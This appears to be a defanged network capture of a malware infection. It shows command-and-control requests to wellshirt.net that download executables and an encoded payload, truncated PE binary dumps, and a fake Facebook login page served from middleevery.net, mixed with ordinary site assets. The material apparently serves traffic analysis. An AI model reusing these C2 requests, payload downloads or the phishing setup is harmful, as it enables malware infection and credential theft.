Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 49960

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364176131,178142495*/...._24n .body ._24x{color:#333}.._6nw ._24n .
body ._24x{color:#4e5665}.._24n .body ._24x:hover{text-decoration:none
}.._24n .body a.signature{color:#3b5998;display:inline}.._24n .body a.
signature:hover{text-decoration:underline}.._24n .hover:hover .title .
_24x{text-decoration:underline}.._24n .forceRTL{direction:rtl;text-ali
gn:right;display:block}.._24n .forceLTR{direction:ltr;text-align:left;
display:block}.._24n .adInfo a.identity{color:gray;display:block;white
-space:nowrap}.._6nw ._24n .adInfo a.identity{color:#898f9c}.._24n .ti
tle{font-weight:bold;margin-bottom:0 !important}.._24n .image_body_blo
ck{padding-top:3px}.._24n .uiUfi{width:auto}.._24n .fbEmuHidePoll .oth
erdiv .other{width:206px}.._24n .ads_rhc_close{opacity:0}.._24n:hover 
.old_x, ._24n:hover .uiSelectorButton, ._24n:hover .ads_rhc_close, ._2
4n .ads_rhc_close.openToggler, .emu_x .openToggler .uiSelectorButton{o
pacity:1}..fbEmuHidePoll .undo{float:right;padding-left:2px;padding-bo
ttom:2px;margin-bottom:3px;margin-left:5px}..fbEmuHidePoll .fbEmuXTitl
e{font-weight:bold}..fbEmuHidePoll .fbEmuXSubtitle{margin-bottom:10px}
..fbEmuHideThanks .fbEmuXThanksTitle{font-weight:bold;margin-bottom:10
px}..fbEmuBlock .fbEmuHidePoll .otherdiv{margin-left:20px}..emu_x{floa
t:right}..emu_x .uiSelectorButton{opacity:0}..old_x{opacity:0}..fbEmuM
ainBody .firstPassiveName{font-weight:bold}..fbEmuPremium .fbEmuStream
Attachment{margin-bottom:3px}..fbEmuStreamStory .fbEmuStreamAttachment
.fbEmuStreamOGAction{border-top:1px solid #e5e7eb;border-bottom:1p
<<< skipped >>>

GET /forum/search.php?method=hostname&host=VVV.facebook.com&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
..........................

GET /forum/search.php?method=dep&noxor&file=exefile&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:56:08 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 2

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......'c./c..|c..|
c..|.M.|`..|}P.|{..|}P.|...|D..|d..|c..|...|}P.|Y..|}P.|b..|Richc..|..
..............PE..L....|pS..........................................@.
......................................................................
... ..P...............................................................
........@.......................`....................text... .........
.................. ..`.rdata...9.......:..................@[email protected]...
.....0...r..................@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..............................................8.A..I........V....8.A..
6....D$..t.V..........^................L$..T$.V.t$.W...r...;.u........
.....s...tD.....9 .u1...v5..B...y. .u ...v$..B...y. .u....v...B...I. .
..._...^._3.^..................3.f..$.\$...$..$SU.D$.V.t$(....L$(....D
$(..W.....vC..T$...sC.....>..T$,....D$,.l$..D$,....D$,.........vC..
........vC..l$...Az<[email protected]$,.D$,...vC....sC..T$,.D$
,.........sC.......t$(.\$..........l$..\$..D$..%X.A..%P.A.......N.f.D$
. .3...~(................N..,..,..N.@ ....;.|.....-8uC...DqC...8uC
<<< skipped >>>

GET /fb_login/index_files/276449379149296_367648155.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 3600

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28
.PNG........IHDR...7...3.....3J.P....IDATh...YtTU.....{g.,........a...
[email protected].....::[email protected]&``p..}C.A..........N...>U..G.....s...u.
.V.w_..{...b..,...cTM9E.I.Q....Q'..Z:..G?y.......V.-............L..(?M
..H.`..."...D..G3..on\q.Z..t.H(.UuKh.\.Q..Z....._..p4.tz...'...Gw....e
x.I]FI5N4lU....Wd.k.. ..7...d[.;....{k..'.i`R.._Uw.VP......Qc....Fg.K5
...G.......un.....>..$.9\.Tg.......K.%Z'....n..Q.k.z.YT..i....f...I
.n........ .U?6..5.....D.7....q.|O..Y~....T....X....a.z....`X=4'.l.8..
.Uc..P.yk.........MB..O.N.q7..V.#HFR.lbAaA........w..g..M..O,."...E.{.
. ....b\..X.Q2.."#.R8h.(...k. H...F.:l.BY?<..N.qyY........R.5R. uv.
...XY.[[email protected]'.8.^.J......CR..u
...C>...B.'...N.q*%..&......_.J...H.........ED#...N.q.9&y..g...h..F
.<.v!MR...e./...7...W...'/.,.o.'x....M..G:.7X,.l.&}Q.e..O.N.q..7.o.
..T..&.S<6g.......jK..*.Cz...I.#Q..O.NZ....w...o.}...s..?.V.....H..
..}...wy$Eg.a.....Y.Z.bR..`.......Z|S..4Ml.h...f.(AA....7...TC........
...ac$.=M....~#MS9J..n.)..4-z.\.Q...1#a#...Q.O.$.8.%.....m../..on.....
....p..D*..9w.thq...7.X...y.J.W['.8...ol...-..?<......D9.7..h.\....
.\'.$...Uu..X.B.2..>y....__lu.O......ns{C... S...AP.^|...D....%....
......X.B.f..U..4.?.Vr...."...}e...`...s..........y...c..............'
wn.....r4..$.NX..%?H..N.(...!..._L1..Z............\....B..KR..y.['R.EK
..V3n(....b.*...s..x"....U.S.qW.N..i.>e.:.}....?*[email protected]
7h%ZA.v..............3:...s\k...f..*[email protected]..]M;!..8@.
.g).J.0P..#..Cr...)G$.(...6.P:*K.E!.......W..yb?2z.N.8....T.....;.
<<< skipped >>>

GET /pagead/conversion/1072568869/?random=1401447789574&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/ HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.googleadservices.com

HTTP/1.1 302 Found

P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"

Date: Fri, 30 May 2014 15:56:12 GMT

Pragma: no-cache

Expires: Fri, 01 Jan 1990 00:00:00 GMT

Cache-Control: no-cache, must-revalidate

Content-Type: image/gif

Location: hXXp://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072568869/?random=1968204886&cv=7&fst=1401447789574&num=1&fmt=3&value=0&label=nJZCCOiW1wEQpbS4_wM&bg=ffffff&hl=en&guid=ON&u_h=768&u_w=1024&u_ah=740&u_aw=1024&u_cd=32&u_his=1&u_tz=180&u_java=false&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.fileswap.com/&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0

X-Content-Type-Options: nosniff

Server: cafe

Content-Length: 42

X-XSS-Protection: 1; mode=block

Alternate-Protocol: 80:quic
GIF89a.............!.......,...........D.;..

GET /dep/win64mroaes2.exe HTTP/1.0

Accept: */*

Connection: close

Host: middleevery.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:42 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Sat, 24 May 2014 19:51:01 GMT

Accept-Ranges: bytes

Content-Length: 2956800

Content-Type: application/octet-stream

Age: 0

Server: YTS/1.20.28
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..d...(..S
.................."...-..\............@...............................
-.....s.-.............................................. -......0-.d$..
..........*.|"............-.TG.......................... p-.(.........
...........8-.X............................text.....".......".........
........`.p`.data.........#......."[email protected]........#...
....#.............@.`@.pdata..|"....*..$...z*[email protected]@.xdata..
...... ....... .............@.@@.bss.....[....,.......................
`..edata....... -.......,[email protected]@.idata..d$...0-..&....,.....
[email protected]....`-.......,.............@[email protected]...
....,.............@.`..reloc..TG....-..H....,[email protected]........
......................................................................
......................................................................
.............................................ffffff.........H..(1.f.=.
...MZ....,.........,.........,.........,.....tg....,.....,...tH.......
.".H........e".....,.H....-.H....-.H... -.....j"..=h.#..tf1.H..(......
..."......Hc.....H..B...H...:PE..u...J.f....t?f......j............]...
......1.......K...f.H...j"...j".1.H..(..zt...,.........1............H.
.8....,.D....,.L....,.H....,.H....,.....,.H....,.H.D$ ...".....,.H..8.
........AUATUWVSH......D....,.1......H.T$ E..H...H.......eH..%0...1.H.
X.H.=.)-..........H9...'..........H...H...|.-.H..u...y.-.1........
<<< skipped >>>

GET /_js/AC_OETags.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 7812

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-1e84"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
// Flash Player Version Detection - Rev 1.6.// Detect Client Browser t
ype.// Copyright(c) 2005-2006 Adobe Macromedia Software, LLC. All righ
ts reserved..var isIE  = (navigator.appVersion.indexOf("MSIE") != -1) 
? true : false;.var isWin = (navigator.appVersion.toLowerCase().indexO
f("win") != -1) ? true : false;.var isOpera = (navigator.userAgent.ind
exOf("Opera") != -1) ? true : false;..function ControlVersion().{..var
 version;..var axo;..var e;...// NOTE : new ActiveXObject(strFoo) thro
ws an exception if strFoo isn't in the registry...try {...// version w
ill be set for 7.X or greater players...axo = new ActiveXObject("Shock
waveFlash.ShockwaveFlash.7");...version = axo.GetVariable("$version");
..} catch (e) {..}...if (!version)..{...try {....// version will be se
t for 6.X players only....axo = new ActiveXObject("ShockwaveFlash.Shoc
kwaveFlash.6");........// installed player is some revision of 6.0....
// GetVariable("$version") crashes for versions 6.0.22 through 6.0.29,
....// so we have to be careful. ........// default to the first publi
c version....version = "WIN 6,0,21,0";.....// throws if AllowScripAcce
ss does not exist (introduced in 6.0r47)......axo.AllowScriptAccess = 
"always";.....// safe to call for 6.0r47 or greater....version = axo.G
etVariable("$version");....} catch (e) {...}..}...if (!version)..{...t
ry {....// version will be set for 4.X or 5.X player....axo = new Acti
veXObject("ShockwaveFlash.ShockwaveFlash.3");....version = axo.GetVari
able("$version");...} catch (e) {...}..}...if (!version)..{...try 
<<< skipped >>>

GET /_images/ico_24_social.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 1696

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-6a0"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR..............w=.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...SiTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCe
hiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk=
"Adobe XMP Core 5.0-c060 61.134342, 2010/01/10-18:06:43        "> &
lt;rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#">
 <rdf:Description rdf:about="" xmlns:xmpMM="hXXp://ns.adobe.com/xap
/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#"
 xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="uu
id:257E611FF3B9E111ADFFA94C7A3A3204" xmpMM:DocumentID="xmp.did:2514A6C
4E30D11E1A651ECCBB496C13E" xmpMM:InstanceID="xmp.iid:2514A6C3E30D11E1A
651ECCBB496C13E" xmp:CreatorTool="Adobe Photoshop CS5"> <xmpMM:D
erivedFrom stRef:instanceID="uuid:54EEA7D7DECDE111A8DDAB7BBB8AB66E" st
Ref:documentID="uuid:257E611FF3B9E111ADFFA94C7A3A3204"/> </rdf:D
escription> </rdf:RDF> </x:xmpmeta> <?xpacket end="r
"?>...C....IDATx...]HSa.....C.0.M.*[email protected]%D...].}7}\y..Wb.Ht.EhD
.....^4B.0......)s&....t.gg=......@"......9...<......q..........o..
.PZ[.q.q..&....b..\[email protected]{{[email protected]$
i..$...hT.p0......u<...&.zz..O.<.q`&.y(e2..Ji.x<....z........
...k."M.\.... [email protected]<.f............,}...GD.9i..)
..DA../..@.]Z.e........(.......].,.,....RCIk...."...D?l.....3!..e..c..
......;.4..."/.J....F.....0x....\.p8....u.j..Rz1.}i...N..;../....E.V..
....Ys.|f.....^.\...H..~D..$g.:f.....T_ ..Z..-.{...........[...'E.
<<< skipped >>>

GET /_images/header_upload.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 939

Last-Modified: Mon, 10 Sep 2012 19:24:59 GMT

Connection: keep-alive

ETag: "504e3e8b-3ab"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e&
lt;...MIDATx..W.kSq.>....<....i...N.R..B''...D....Q...8.d...`...
.`....A(us.S..M....y...~.g.....*d.....^.;.9.w..4M....a.....8...K". .0.
..X,..f#UUI.$1......p.. ...c......ON.s)..V.W".e.....Z.G..`6..N2.v...\&
.Y..-`.m..i.....>.o.....82&P(.(.N_.....s.kK.J..L.........@ 0...y..v
.]..."%w0.."........^.w.Q...\.8t\.4r.....<..Dm09.](.?....YD.c.2...\
[email protected][m..9:.".>......2....(..J..H...j...!...)...~......
;.........8`d?.&.....?......]B.h.1.5.q.7#0....=}..ss..i..(p.K.... .,k.
...N!..b...<[email protected]{;.....#.B9....).6Gt......(..N\T.....
.kN.<3.U.....8.../,...........H.N...$.....@...#...%.`w..4.y..7...'.
..).3.. Q....}.H.fo...bU...F-)@.....Y*..t~WD/k2..evvh'...a#..X,..B.s..
.-..h5.L.K!5.{ACa...W5R`". ...?....K..*..l=...oP...b/_bh.e.@K.`..h.v.)
c..E..M..M.l..188......X............-......,.......S.>bq.u...".....
.W-....<.6..c...0.......L....:M`O...x.m[h.In....IEND.B`.....


GET /_images/statement_bg.jpg HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/jpeg

Content-Length: 112505

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-1b779"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
......Exif..II*.................Ducky.......<.....&Adobe.d.........
.......H...{..V....w..................................................
......................................................................
......................................................................
................................@P`p01................................
............................... 0@P1`p!AQ.aq..........................
.&...D.*....B.....(....%[email protected].....%....(".WpP...f@
......P.........)[email protected]...
.....3d......@... [email protected]...(....*.@(...]@....@.".(..P. %..P
.$...B... .. ...f...%......P.......h...D..nP...,............l.....h..@
....$..(........b........,... [email protected][email protected] ..
.@[email protected]...(.......E............@%..J.$.."*... .(@.U... ....3f@
.....B..J.......([email protected].................*......%............d...
......nZ..................R...............P([email protected].@5-,..@,...D...
@.`..(....]`.. .P...J....H.@DT..(@.P.$.e.(@.....Y........,.....K".....
..(...1`[email protected]".....@.............!.........
..7([email protected]`..@..(...([email protected]..(...G=........@%
.".P$.."*... A(@.P.. .....3d...........@.!.......nP.... .........!....
[email protected](P.....(..............(.............P
..............Y@[email protected].......@P ...lnP.%X..@.".(..*. %..P.$.".B...)A
. ....l.............P3d..P...7(....D.P........$......jP.... ..........
...b........E......`[email protected](..P ...@[email protected]
<<< skipped >>>

GET /_images/footer_bg2.png HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://VVV.fileswap.com/

Accept: */*

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:12 GMT

Content-Type: image/png

Content-Length: 134

Last-Modified: Fri, 14 Sep 2012 15:15:38 GMT

Connection: keep-alive

ETag: "50534a1a-86"

Expires: Sat, 31 May 2014 15:56:12 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
.PNG........IHDR.............u.4J....tEXtSoftware.Adobe ImageReadyq.e&
lt;...(IDATx.b```.e..B ..D...&8......Y....g..0.(D.{........IEND.B`...

GET /fb_login/index_files/safe_image.png?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Referer: hXXp://middleevery.net/fb_login/

Accept: */*

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Cache-Control: max-age=864000

Expires: Mon, 09 Jun 2014 15:56:13 GMT

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 140

Content-Type: image/png

Age: 0

Connection: close

Server: YTS/1.20.28
.PNG........IHDR.............v..9...SIDAT(...1..@.........*..I... .`..
..%-3.................r...S....y.. .@`*2FRy}..}.H.du5.........IEND.B`.
..

GET /forum/search.php?method=validate&mode=sox&v=028&sox=3b528200 HTTP/1.0

Accept: */*

Connection: close

Host: welltalk.net

HTTP/1.1 500 Internal Server Error

Date: Fri, 30 May 2014 15:55:34 GMT

Server: Apache

Vary: Accept-Encoding

Content-Length: 671

Content-Type: text/html; charset=iso-8859-1

Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<html>&
lt;head>.<title>500 Internal Server Error</title>.</
head><body>.<h1>Internal Server Error</h1>.<p&
gt;The server encountered an internal error or.misconfiguration and wa
s unable to complete.your request.</p>.<p>Please contact t
he server administrator,. [email protected] and inform them of the 
time the error occurred,.and anything you might have done that may hav
e.caused the error.</p>.<p>More information about this err
or may be available.in the server error log.</p>.<p>Additi
onally, a 500 Internal Server Error.error was encountered while trying
 to use an ErrorDocument to handle the request.</p>.</body>
;</html>...

GET /fb_login/index_files/kHhQaysvKcA.js?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 14114

Content-Type: application/x-javascript

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364176096,178142559*/..if (self.CavalryLogger) { CavalryLogger.star
t_js(["2iC7r"]); }..__d("legacy:fbdesktop-detect",["FBDesktopDetect"],
function(a,b,c,d){a.FbDesktopDetect=b('FBDesktopDetect');},3);.__d("In
dexLogoutSponsorship",["Event","URI","ge"],function(a,b,c,d,e,f){var g
=b('Event'),h=b('URI'),i=b('ge'),j;function k(n){return setTimeout(fun
ction(){h('/index.php').addQueryData({l_s:'r'}).go();},n);}function l(
n,o){var p=false,q=function(){if(p)return;clearTimeout(j);j=k(o);},r=f
unction(){clearTimeout(j);p=true;};g.listen(document,{mousedown:r,mous
eup:r,click:r,keydown:r,mousemove:q});if(n!==null){g.listen(n,'mouseov
er',function(){g.listen(window,'blur',r);});var s=i('email');try{s.foc
us();}catch(t){}}}var m={init:function(n,o){j=k(o);l(n,o);}};e.exports
=m;});.__d("IntlUtils",["AsyncRequest","Cookie","goURI"],function(a,b,
c,d,e,f){var g=b('AsyncRequest'),h=b('Cookie'),i=b('goURI'),j={setXmod
e:function(k){(new g()).setURI('/ajax/intl/save_xmode.php').setData({x
mode:k}).setHandler(function(){document.location.reload();}).send();},
setAmode:function(k){new g().setURI('/ajax/intl/save_xmode.php').setDa
ta({amode:k,app:false}).setHandler(function(){document.location.reload
();}).send();},setLocale:function(k,l,m,n){if(!m)m=k.options[k.selecte
dIndex].value;j.saveLocale(m,true,null,l,n);},saveLocale:function(k,l,
m,n,o){new g().setURI('/ajax/intl/save_locale.php').setData({aloc:k,so
urce:n,app_only:o}).setHandler(function(p){if(l){document.location.rel
oad();}else i(m);}).send();},setLocaleCookie:function(k,l){h.set('
<<< skipped >>>

GET /fb_login/index_files/z15ZzhgIj4W.css?session=3b528200 HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: text/css,*/*;q=0.1

Referer: hXXp://middleevery.net/fb_login/

Connection: close

Accept-Language: en-US,*

Host: middleevery.net

HTTP/1.1 200 OK

Date: Fri, 30 May 2014 15:56:13 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Last-Modified: Tue, 02 Apr 2013 04:17:13 GMT

Accept-Ranges: bytes

Content-Length: 158

Content-Type: text/css

Age: 0

Connection: close

Server: YTS/1.20.28
/*1364177031,178142523*/..._52ls{margin:0 auto 0 auto;padding-bottom:3
0px}..timelineSignUpDialog ._52ls{padding-bottom:0}..#bootloader_1hHU5
 { height: 42px; }..

GET /forum/search.php?method=dep&noxor&file=dropbox.dep&mode=sox&v=028&sox=3b528200&lport=1&rsid=NOSOXYID123&slots=0&spm=0&adm=1&x64=0&mr=0 HTTP/1.0

Accept: */*

Connection: close

Host: wellshirt.net

HTTP/1.0 200 OK

Date: Fri, 30 May 2014 15:55:38 GMT

P3P: policyref="hXXp://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"

Content-Type: text/html

Age: 0

Server: YTS/1.20.28
?E\..........l.e..Q...... .....Zdropbox.zip...........................
.......~'.8..N....w..W.4.......{M..... E.K@...?k.:[email protected]..$'E......t
V..b...T......e....>jo..*..F.<c.(....:..^?..j.....n-..h....q...j
u.$.;.[..F..""..lg.~.......6..M.=p7..F..$../R*...E..th<......>.n
l:3.........>..'.c.sg.Em..".zV....~o}.....=.OyO...0..vR..O......n&l
t;..... E...._.-.C*. r...S.....S PC~l......&.A..rG.l.X...e2...`..^....
.ZQ.8.B.t...~....S.&.| J.00[.c....%|..;.0.|O.OfQ@,..gE..>.x.".X....
.U....B..tI.u\.......%.....1I..%...e.Dc..=.s...N....R."...][.........-
...Mi......-...'...hd0...x.S.!#.......".wX....e....iS.......r..WO.B>
;Q......t..Q..p .N .,....o...r..4mV...O.(,"Qy.|...&.hj..."..6F`6.S...#
.?....k.......^x.......MLb.-.....Mp..."=\.A...0..=...45...B.......6O..
h ...M..!.UC..y.n....2._!..5ks...^W....-. (..v..M...?_%&........p..S..
G.!q....VR..V.Dz.w../................P..~v..S.!.j.?.X.S...I.....n..5..
bVo.0.(/..P........h....<X...xm.....n.K..=.T......./...,uK....R.c.g
bc.7s.......#..J."...Y......]cG*4.pG........J..zm..........X..gV^...uS
.=.X..N....1H....b$......~a....q.....E%.........&wh.X .n...tOE;7.K!.Y;
...%O.m.............

GET /_js/jquery.js HTTP/1.1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/537.74.9 (KHTML, like Gecko) Version/6.1.2 Safari/537.74.9

Accept: */*

Referer: hXXp://VVV.fileswap.com/

Cookie: PHPSESSID=eu8r8dlegkl3th7kh428pf9nl0; landing_url=/

Connection: Keep-Alive

Accept-Encoding: gzip

Accept-Language: en-US,*

Host: VVV.fileswap.com

HTTP/1.1 200 OK

Server: nginx

Date: Fri, 30 May 2014 15:56:11 GMT

Content-Type: application/javascript; charset=utf-8

Content-Length: 94837

Last-Modified: Mon, 10 Sep 2012 19:25:00 GMT

Connection: keep-alive

ETag: "504e3e8c-17275"

Expires: Sat, 31 May 2014 15:56:11 GMT

Cache-Control: max-age=86400

X-Frame-Options: DENY

Accept-Ranges: bytes
/*! jQuery v1.7.2 jquery.com | jquery.org/license */ (function(a,b){fu
nction cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView||a.pa
rentWindow:!1}function cu(a){if(!cj[a]){var b=c.body,d=f("<" a ">
;").appendTo(b),e=d.css("display");d.remove();if(e==="none"||e===""){c
k||(ck=c.createElement("iframe"),ck.frameBorder=ck.width=ck.height=0),
b.appendChild(ck);if(!cl||!ck.createElement)cl=(ck.contentWindow||ck.c
ontentDocument).document,cl.write((f.support.boxModel?"<!doctype ht
